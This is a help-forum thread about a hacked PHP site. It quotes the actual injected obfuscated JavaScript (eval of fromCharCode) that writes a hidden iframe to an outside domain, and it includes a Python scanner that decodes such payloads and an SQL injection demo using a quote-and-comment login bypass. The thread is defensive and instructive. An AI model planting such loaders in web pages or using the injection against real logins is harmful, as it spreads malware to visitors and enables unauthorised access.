oh_maestro asked:
Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also

I have a web site (I will give you the URL if someone says it is OK) in which I've had a couple browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse

I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.

My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.

Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.

My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
ASKER CERTIFIED SOLUTION by Rich Rumble (members-only; text not shown on this page)
SOLUTION (members-only; text not shown on this page)
oh_maestro (ASKER):
hxxp://www.openhousesohio.com

Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
 and this
<script type="text/javascript">
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))

I did not type any of this code.

I do not see this code when I go to View+Source in IE. I also do not see anything like this on my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.

Has my site been hacked?
Increasing Pts!
SOLUTION (members-only; text not shown on this page)
PHP4 is pretty old, you should upgrade if possible. There were several SQL injection attacks against that version of DW, make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a GoDaddy server? They should provide more up-to-date instances of PHP.

http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
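The script the asker found is a classic pattern: eval(String.fromCharCode(...)) hides a document.write() that assembles a 1x3 pixel iframe from split string pieces and variables, which is why it never shows up as a literal "<iframe" in the source. The following is an added example (not code from this thread or from any tool named in it) that does the "find anything that is not yours" step statically: it walks a web root, decodes any fromCharCode payload without executing it, folds the string concatenation back together, and reports frames sized to a few pixels. The sample page it scans is constructed here with a placeholder domain (example.invalid), not the attacker's host from the question.

```python
import os
import re
import tempfile

# eval(String.fromCharCode(118,97,114,...)) as seen in the injected script.
FROMCHARCODE_RE = re.compile(
    r"eval\s*\(\s*String\.fromCharCode\s*\(\s*([0-9][0-9,\s]*)\)\s*\)", re.I)
VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')
WRITE_RE = re.compile(r"document\.write\s*\(\s*'(.*?)'\s*\)\s*;", re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
DIM_RE = re.compile(r'(?:height|width)\s*=\s*"?(\d+)', re.I)


def decode_fromcharcode(codes: str) -> str:
    """Map the comma-separated char codes back to text; nothing is evaluated."""
    return "".join(chr(int(c)) for c in re.split(r"[,\s]+", codes.strip()) if c)


def fold_concatenation(js: str) -> str:
    """Substitute var x="..." pieces into '+x+' joins and drop '+' between literals."""
    for name, value in VAR_RE.findall(js):
        js = js.replace("'+" + name + "+'", value)
    return js.replace("'+'", "")


def hidden_iframes(html: str):
    """Return iframe tags whose width or height is three pixels or less."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        dims = [int(d) for d in DIM_RE.findall(m.group(0))]
        if dims and min(dims) <= 3:
            hits.append(m.group(0))
    return hits


def analyze_text(text: str):
    """Suspicious frames in one file: literal tags plus those built by obfuscated JS."""
    findings = hidden_iframes(text)
    for m in FROMCHARCODE_RE.finditer(text):
        decoded = fold_concatenation(decode_fromcharcode(m.group(1)))
        for written in WRITE_RE.findall(decoded):
            findings += hidden_iframes(written)
    return findings


def scan_tree(root: str, exts=(".php", ".html", ".htm", ".js")):
    """Walk the web root; map each offending file to the frames it would emit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = analyze_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


# Constructed sample in the style of the injected script (placeholder domain):
# it writes a 1x3 pixel iframe and pads with decoy assignments.
SAMPLE_JS = ('var q=7711;var a="ifr";var s="htt";var h="example.invalid";'
             "document.write('<'+a+'ame sr'+'c=\"'+s+'p://'+h+'/'+'\" wid'"
             "+'th=\"1\" h'+'eight=\"3\"></if'+'rame>'); function d(){var s=4345;}")
SAMPLE_PAGE = ("<html><body><p>Listings</p>\n<script type=\"text/javascript\">\n"
               "eval(String.fromCharCode("
               + ",".join(str(ord(c)) for c in SAMPLE_JS) + "))\n</script></body></html>\n")
CLEAN_PAGE = "<html><body><p>Nothing to see</p></body></html>\n"


def demo():
    """Write the constructed pages into a temp web root and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_PAGE)
    with open(os.path.join(root, "about.html"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_PAGE)
    return scan_tree(root)


if __name__ == "__main__":
    for path, frames in demo().items():
        print(path)
        for tag in frames:
            print("   ", tag)
```

The decoder deliberately avoids any JavaScript engine: substituting the quoted var values and removing `'+'` is enough for this obfuscator, and on the payload quoted above it yields the same iframe the asker spotted with Firebug. Files the scanner flags should be compared against a known-good copy from the local Dreamweaver project rather than edited in place, since the injected block is usually appended to every page at once.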
I think your login form needs sanitization, download xss-me and sql-inject-me Firefox extensions. Go to your login page, right click and select "open xss me sidebar" or the sql-inject me sidebar, run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
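To make the login-form point concrete, here is an added example (mine, not from this thread) that shows the two query styles side by side against a throwaway SQLite table with one constructed user. The string-built version is the PHP 4 era pattern the advice above warns about; the hardened version binds the username as a parameter and compares the stored hash in constant time. The table, user and password are constructed sample data, and the unsalted SHA-256 only keeps the sample short; a real deployment would use a slow, salted password hash.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password: str) -> str:
    """Stand-in password hash (constructed sample; not a recommended scheme)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pwhash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", pw_hash("correct horse")))
    return db


def login_unsafe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Query built by string formatting: quotes in the input change the SQL itself."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND pwhash = '%s'"
           % (username, pw_hash(password)))
    return db.execute(sql).fetchone() is not None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the username is bound as data, never parsed as SQL."""
    row = db.execute("SELECT pwhash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison so the check does not leak via timing.
    return hmac.compare_digest(row[0], pw_hash(password))


def compare(username: str, password: str):
    """Run both versions on the same input; returns (unsafe_result, safe_result)."""
    db = make_db()
    return login_unsafe(db, username, password), login_safe(db, username, password)


if __name__ == "__main__":
    print("valid credentials      :", compare("alice", "correct horse"))
    print("wrong password         :", compare("alice", "wrong"))
    print("quote-and-comment input:", compare("' OR 1=1 --", "anything"))
```

Running it shows the unsafe form returning True for the third input while the parameterized form returns False, which is exactly the difference the sql-inject-me sidebar is probing for. Escaping with mysql_real_escape_string closes the same hole for quoted string literals, but bound parameters remove the string-assembly step entirely, so there is nothing left to escape.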
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
Glad to help, and beyond password choices input validation is a must to avoid SQL injection. The site looks solid from an XSS point of view, but SQL injection on your login form could be worse.
Good luck!
-rich
That's good stuff! Thanks for the feedback :)